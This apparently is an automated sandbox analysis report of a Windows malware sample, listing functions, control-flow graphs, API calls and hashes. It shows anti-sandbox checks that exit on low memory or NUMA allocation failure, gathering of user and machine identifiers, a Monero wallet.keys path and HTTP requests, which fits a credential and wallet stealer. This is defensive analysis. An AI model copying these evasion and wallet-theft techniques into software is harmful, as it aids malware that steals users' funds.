                  • Instruction ID: 0bf763147c3e928fd7c118432885c3b2cd9def05516b07a40c1f2ddf128c5c5c
                  • Opcode Fuzzy Hash: b474d22184451e114ac10874c894a0dcc71762f74e21f76d10f5ad687caf6226
                  • Instruction Fuzzy Hash: 71E111719101089ADB1CFBA8DD969ED7378FF54300F508129B506D65D6EF386B0ACBA3
                  Function 008817A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1301 8817a0-8817cd call 88aad0 StrCmpCA 1304 8817cf-8817d1 ExitProcess 1301->1304 1305 8817d7-8817f1 call 88aad0 1301->1305 1309 8817f4-8817f8 1305->1309 1310 8817fe-881811 1309->1310 1311 8819c2-8819cd call 88a800 1309->1311 1312 88199e-8819bd 1310->1312 1313 881817-88181a 1310->1313 1312->1309 1316 881849-881858 call 88a820 1313->1316 1317 8818ad-8818be StrCmpCA 1313->1317 1318 8818cf-8818e0 StrCmpCA 1313->1318 1319 88198f-881999 call 88a820 1313->1319 1320 881821-881830 call 88a820 1313->1320 1321 88185d-88186e StrCmpCA 1313->1321 1322 88187f-881890 StrCmpCA 1313->1322 1323 881970-881981 StrCmpCA 1313->1323 1324 8818f1-881902 StrCmpCA 1313->1324 1325 881951-881962 StrCmpCA 1313->1325 1326 881932-881943 StrCmpCA 1313->1326 1327 881913-881924 StrCmpCA 1313->1327 1328 881835-881844 call 88a820 1313->1328 1316->1312 1331 8818ca 1317->1331 1332 8818c0-8818c3 1317->1332 1333 8818ec 1318->1333 1334 8818e2-8818e5 1318->1334 1319->1312 1320->1312 1350 88187a 1321->1350 1351 881870-881873 1321->1351 1329 88189e-8818a1 1322->1329 1330 881892-88189c 1322->1330 1344 88198d 1323->1344 1345 881983-881986 1323->1345 1335 88190e 1324->1335 1336 881904-881907 1324->1336 1341 88196e 1325->1341 1342 881964-881967 1325->1342 1339 88194f 1326->1339 1340 881945-881948 1326->1340 1337 881930 1327->1337 1338 881926-881929 1327->1338 1328->1312 1352 8818a8 1329->1352 1330->1352 1331->1312 1332->1331 1333->1312 1334->1333 1335->1312 1336->1335 1337->1312 1338->1337 1339->1312 1340->1339 1341->1312 1342->1341 1344->1312 1345->1344 1350->1312 1351->1350 1352->1312
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 008817C5
                  • ExitProcess.KERNEL32 ref: 008817D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: dafb26ef4f09eabc0598e0337a3ed63166086652789dc8ed4ed832ef38c56721
                  • Instruction ID: eec8e0b3051a10884474aeefae7974460478edb427000971f7b0d36a838112cf
                  • Opcode Fuzzy Hash: dafb26ef4f09eabc0598e0337a3ed63166086652789dc8ed4ed832ef38c56721
                  • Instruction Fuzzy Hash: 4C5159B4A00209EFDF04EFE4D958ABE7BB9FF44304F108159E406E7291DB74A952CB62
                  Function 00887500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1356 887500-88754a GetWindowsDirectoryA 1357 88754c 1356->1357 1358 887553-8875c7 GetVolumeInformationA call 888d00 * 3 1356->1358 1357->1358 1365 8875d8-8875df 1358->1365 1366 8875fc-887617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 8875e1-8875fa call 888d00 1365->1367 1369 887628-887658 wsprintfA call 88a740 1366->1369 1370 887619-887626 call 88a740 1366->1370 1367->1365 1377 88767e-88768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00887542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0088757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0088760A
                  • wsprintfA.USER32 ref: 00887640
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 87ca5ba061a652329c6a7dc23ef0549e2fc37331dda6111445ff243191bcbb1c
                  • Instruction ID: f16159ff6bcd18fc36a25d2b093aa9c4cfa411238a7d2ebaf7ec931c69e0f2aa
                  • Opcode Fuzzy Hash: 87ca5ba061a652329c6a7dc23ef0549e2fc37331dda6111445ff243191bcbb1c
                  • Instruction Fuzzy Hash: F44183B1D04248EBDB10EF98DC45BDEBBB8FF18704F100199F509A7291D778AA44CBA6
                  Function 008869F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0738), ref: 008898A1
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0840), ref: 008898BA
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D05D0), ref: 008898D2
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D05E8), ref: 008898EA
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0618), ref: 00889903
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D8940), ref: 0088991B
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015C6920), ref: 00889933
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015C69A0), ref: 0088994C
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0660), ref: 00889964
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D06A8), ref: 0088997C
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0558), ref: 00889995
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D06C0), ref: 008899AD
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015C6700), ref: 008899C5
                    • Part of subcall function 00889860: GetProcAddress.KERNEL32(75900000,015D0708), ref: 008899DE
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 008711D0: ExitProcess.KERNEL32 ref: 00871211
                    • Part of subcall function 00871160: GetSystemInfo.KERNEL32(?), ref: 0087116A
                    • Part of subcall function 00871160: ExitProcess.KERNEL32 ref: 0087117E
                    • Part of subcall function 00871110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0087112B
                    • Part of subcall function 00871110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00871132
                    • Part of subcall function 00871110: ExitProcess.KERNEL32 ref: 00871143
                    • Part of subcall function 00871220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0087123E
                    • Part of subcall function 00871220: ExitProcess.KERNEL32 ref: 00871294
                    • Part of subcall function 00886770: GetUserDefaultLangID.KERNEL32 ref: 00886774
                    • Part of subcall function 00871190: ExitProcess.KERNEL32 ref: 008711C6
                    • Part of subcall function 00887850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008711B7), ref: 00887880
                    • Part of subcall function 00887850: RtlAllocateHeap.NTDLL(00000000), ref: 00887887
                    • Part of subcall function 00887850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0088789F
                    • Part of subcall function 008878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887910
                    • Part of subcall function 008878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00887917
                    • Part of subcall function 008878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0088792F
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015D89B0,?,0089110C,?,00000000,?,00891110,?,00000000,00890AEF), ref: 00886ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00886AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00886AF9
                  • Sleep.KERNEL32(00001770), ref: 00886B04
                  • CloseHandle.KERNEL32(?,00000000,?,015D89B0,?,0089110C,?,00000000,?,00891110,?,00000000,00890AEF), ref: 00886B1A
                  • ExitProcess.KERNEL32 ref: 00886B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2931873225-0
                  • Opcode ID: dc63c0e37c905a9a1242f1a47119529da8264cca6ef2df2a5a68b53499393dd3
                  • Instruction ID: 925faf0a7f17a51dd7498f27c5bce20b580d4af7066849018f7a510d54ff68e1
                  • Opcode Fuzzy Hash: dc63c0e37c905a9a1242f1a47119529da8264cca6ef2df2a5a68b53499393dd3
                  • Instruction Fuzzy Hash: 9031E971904218AAEB08F7E8DC56AAE7778FF14300F504529F112E65D2EF74A946C7A3
                  Function 00886AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1436 886af3 1437 886b0a 1436->1437 1439 886aba-886ad7 call 88aad0 OpenEventA 1437->1439 1440 886b0c-886b22 call 886920 call 885b10 CloseHandle ExitProcess 1437->1440 1445 886ad9-886af1 call 88aad0 CreateEventA 1439->1445 1446 886af5-886b04 CloseHandle Sleep 1439->1446 1445->1440 1446->1437
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015D89B0,?,0089110C,?,00000000,?,00891110,?,00000000,00890AEF), ref: 00886ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00886AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00886AF9
                  • Sleep.KERNEL32(00001770), ref: 00886B04
                  • CloseHandle.KERNEL32(?,00000000,?,015D89B0,?,0089110C,?,00000000,?,00891110,?,00000000,00890AEF), ref: 00886B1A
                  • ExitProcess.KERNEL32 ref: 00886B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: a8feea7bbc148f653bed9bb5c338200a89b19f947784236ead596d70aba34df2
                  • Instruction ID: 4448e0958dc79740c07b1c93c0433158e68934dc52f4f4aae967aedb8369dcab
                  • Opcode Fuzzy Hash: a8feea7bbc148f653bed9bb5c338200a89b19f947784236ead596d70aba34df2
                  • Instruction Fuzzy Hash: 1EF03470A44229ABE704FBE09C0ABBE7B34FB24705F104A15F512E15E2EBB15941DBA7
                  Function 008747B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00874839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00874849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 2e4c6ebf6e1284f32fafe474a81f0776292b492b6a0895e60d34ca5317a3be4e
                  • Instruction ID: da72816c8426b08c005d694421c9d066695ed8e9dca935079484d0ad5d42d2d3
                  • Opcode Fuzzy Hash: 2e4c6ebf6e1284f32fafe474a81f0776292b492b6a0895e60d34ca5317a3be4e
                  • Instruction Fuzzy Hash: 412142B1D00209ABDF14DFA5EC45ADD7B74FB44310F108625F515A72D1DB70660ACF91
                  Function 008851F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 00876280: InternetOpenA.WININET(00890DFE,00000001,00000000,00000000,00000000), ref: 008762E1
                    • Part of subcall function 00876280: StrCmpCA.SHLWAPI(?,015DE4A0), ref: 00876303
                    • Part of subcall function 00876280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00876335
                    • Part of subcall function 00876280: HttpOpenRequestA.WININET(00000000,GET,?,015DDD58,00000000,00000000,00400100,00000000), ref: 00876385
                    • Part of subcall function 00876280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008763BF
                    • Part of subcall function 00876280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008763D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00885228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 776f853b27803e372aef6aff5dce67e8116b7cc25289123d5b20cb255c88a75a
                  • Instruction ID: 9f37d48334b64a4fa34de2ce712c17123633721bbb2a407c1087499da83d4cfe
                  • Opcode Fuzzy Hash: 776f853b27803e372aef6aff5dce67e8116b7cc25289123d5b20cb255c88a75a
                  • Instruction Fuzzy Hash: 2911DD30910548A6DB18FB68DD96AED7378FF50300F408165F81A965D2EF39AB05C793
                  Function 00871220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1493 871220-871247 call 8889b0 GlobalMemoryStatusEx 1496 871273-87127a 1493->1496 1497 871249-871271 call 88da00 * 2 1493->1497 1499 871281-871285 1496->1499 1497->1499 1501 871287 1499->1501 1502 87129a-87129d 1499->1502 1504 871292-871294 ExitProcess 1501->1504 1505 871289-871290 1501->1505 1505->1502 1505->1504
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0087123E
                  • ExitProcess.KERNEL32 ref: 00871294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 803317263-2766056989
                  • Opcode ID: a7dd6992392f3180204e89abeb0abb50ab4389c12dbe6d24f11458f21520b714
                  • Instruction ID: f2127b2f03cee1c07d210fdaf77e47c3d59eb869007ac9acc238403e74875a9b
                  • Opcode Fuzzy Hash: a7dd6992392f3180204e89abeb0abb50ab4389c12dbe6d24f11458f21520b714
                  • Instruction Fuzzy Hash: F2014BB0954308FAEF10EBE8CC49B9EBB78FB14705F208148E709F62C5D7749941879A
                  Function 00871110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0087112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00871132
                  • ExitProcess.KERNEL32 ref: 00871143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: e90569f6889517c00f0735e35ab0e933a1904d9bd484107040bad44753a07e20
                  • Instruction ID: 6c422c0fc41b33f7fcb591f20b717a92a3729dc3b7ecafa5ac52d132f853d578
